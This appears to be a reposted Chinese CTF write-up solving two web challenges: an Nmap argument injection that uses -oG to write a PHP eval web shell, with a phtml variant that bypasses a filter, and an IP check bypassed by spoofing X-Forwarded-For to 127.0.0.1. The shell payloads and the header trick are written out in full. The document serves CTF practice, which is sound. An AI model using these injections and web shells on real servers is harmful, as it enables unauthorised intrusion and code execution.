[PHP知识库] 一天一道ctf 第34天

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> PHP知识库 -> 一天一道ctf 第34天 -> 正文阅读

[PHP知识库]一天一道ctf 第34天

[网鼎杯 2020 朱雀组]Nmap
在这里插入图片描述
这题和之前有一道Online Tool很像，都是操纵NMAP。参数-oG会将结果存放到hack.php文件里

' <?php @eval($_POST["hack"]);?> -oG hack.php '

结果页面回显给我们一个Hacker…，看来是有什么被过滤了。测试下来是php被过滤了，换成标签phtml就可以了(注意两边两个单引号是要的)

' <?= @eval($_POST["hack"]);?> -oG hack.phtml '

上传成功后用蚁剑连接，cat /flag拿到flag

[MRCTF2020]PYWebsite
看一下源码发现了这个东西，想着怎么绕过MD5，访问flag.php后看样子用不着了，验证都是在后端的。
在这里插入图片描述

这里提到了IP但我怎么也没想到只要把IP改成127.0.0.1就行了（会不会太简单了点？）
直接在flag.php页面抓包然后加上x-forwarded-for:127.0.0.1

但我用不bp放包总是显示请求超时，最后用的火狐的hackbar，成功拿到flag
在这里插入图片描述